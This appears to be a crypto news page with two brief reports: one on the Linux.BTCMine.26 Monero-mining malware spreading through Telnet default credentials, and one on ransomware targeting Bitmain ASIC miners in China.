New crypto mining malware attacks Linux

The new cryptocurrency mining malware attacks Linux using Minergate’s Monero Pool
25 August 2017   3500

A cryptocurrency mining malware strikes again: the malware referred to as Linux.BTCMine.26 is actively distributed to Linux computers using default Telnet credentials. Despite its name, it does not mine Bitcoin but is interested in Monero, an altcoin which has recently surged in value after weeks of sideways trading action. Additionally, it only targets X86-64 and ARM hardware-based devices.

How it works?

The Linux.BtcMine.26 distribution scheme is pretty similar to the mechanism for infecting of Mirai. Thus, Linux.BtcMine.26 has a built-in Telnet scanner similar to the one found in the Mirai malware. For now, this scanner will only seek out IPv4 addresses, although IPv6 support may be added in the future. Once it finds a susceptible IP address, it will attempt to log in through a Telnet connection. Assuming this connection is made successfully, the malware will execute commands to download the BTCMine binary in question, themerkle.com reports.

Linux.BTCMine.26 mining malware code Linux.BTCMine.26 mining malware code

It's noteworthy, that the malware’s source code has many references to Brian Krebs, one of the industry leaders when it comes to infosec, as seems like there's a war going on between infosec journalists and cybercriminals. The code also reveals that the malware uses the Minergate XMR pool to successfully mine the cryptocurrency.

Chinese Miners to Fall Victims of Ransomware

Looks like ransomware came together with "improved" firmware, that should "overclock" device
21 January 2019   79

In China, a ransomware spreads, victims of which are Bitcoin miners. The damage from its activities is measured in tens of thousands of dollars. This is reported by Trustnodes.

The virus infects miners, released by Bitmain, and requires you to send 10 bitcoins, otherwise threatening to cause overheating of the device.

The problem is solved by formatting the SD card of the infected device, however, as Trustnodes notes, the whole process can take up to four days, while malicious software rapidly spreads to the other miners.

Compromised device
Compromised device

Probably, the virus comes with an "improved" firmware for miners. Some owners install such firmware to “overclock” their ASIC devices and improve their performance.

The first messages about the virus refer to August last year. In particular, Antminer S9, T9 and even L3 + for Litecoin were attacked. Over time, the malware has been improved. Now its distributor himself can decide when to display a message requesting a ransom. One miner also said that one night the address to which the 4,000 devices belonging to him sent the mined cryptocurrency was changed to the address of the hacker, which brought him $ 8,000.